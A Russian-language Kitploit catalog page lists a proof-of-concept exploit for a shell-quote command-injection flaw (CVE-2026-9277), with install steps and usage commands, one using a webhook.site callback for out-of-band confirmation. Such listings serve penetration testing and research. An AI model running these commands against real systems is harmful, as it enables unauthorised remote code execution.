Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-9277 — Эксплойт proof-of-concept для CVE-2026-9277, уязвимости внедрения команд в библиотеке shell-quote. Выполняет рекурсивный обход JSON с комбинаторной мутацией для запуска RCE, поддерживает OOB-верификацию и ведение журнала без шума. | Kitploit
Инструменты/GitHubGitHub/dylanzahedi/cve-2026-9277
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubdylanzahedi/cve-2026-9277

CVE-2026-9277

Эксплойт proof-of-concept для CVE-2026-9277, уязвимости внедрения команд в библиотеке shell-quote. Выполняет рекурсивный обход JSON с комбинаторной мутацией для запуска RCE, поддерживает OOB-верификацию и ведение журнала без шума.

Репозиторий
211 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-9277 - Эксплойт командной инъекции Shell-Quote

Специализированный Proof of Concept (PoC) скрипт, разработанный для проверки и демонстрации CVE-2026-9277 — структурной уязвимости командной инъекции, обнаруженной в устаревших версиях библиотеки shell-quote (<= 1.8.3).

Сканер выполняет глубокую структурную обработку входных JSON-полезных нагрузок для выявления векторов удаленного выполнения кода (RCE) посредством рекурсивного обхода, предотвращая ложные срабатывания с помощью динамического сетевого базового таймингового движка.


Ключевые особенности

  • Рекурсивный обход JSON: Автоматически обнаруживает и изменяет целевые массивы, скрытые внутри многоуровневых вложенных JSON-структур или конфигураций, подобных GraphQL.
  • Комбинаторная матрица мутаций: Тестирует продвинутые сценарии манипуляции массивами, включая вставки по конкретным индексам, абсолютные переопределения списков и разрозненные пары массивов.
  • Автоматизированная OOB-архитектура: Обрабатывает продвинутые внеполосные (Out-of-Band) схемы выполнения, разделяя компоненты {"op": "..."} и аргументы для успешного обхода механизмов изоляции строк.
  • Бесшумное логирование: Тихий движок выполнения, который отфильтровывает сломанные/неэксплуатируемые ответы с ошибкой 500, выводя исключительно подтвержденные доказательства.

Установка и настройка

Убедитесь, что установлен Python 3.10+ и необходимые пакеты:

root@kitploit:~
git clone https://github.com/DylanZahedi/CVE-2026-9277.git
cd CVE-2026-9277
pip install requests urllib3

Примеры выполнения

Пример 1: Локальное сканирование с утечкой вывода

root@kitploit:~
python CVE-2026-9277.py -u "https://example.com/command" -b '{"message_tokens": ["Hello", "from", "normal user"]}'

Пример 2: Внеполосное (OOB) тестирование с вложенной словарной структурой

root@kitploit:~
python CVE-2026-9277.py -u "https://example.com/command" -b '{"user": {"commands": ["a", "b"]}}' -w "https://webhook.site/your-uuid-here"


CVE-2026-9277
Скачать инструмент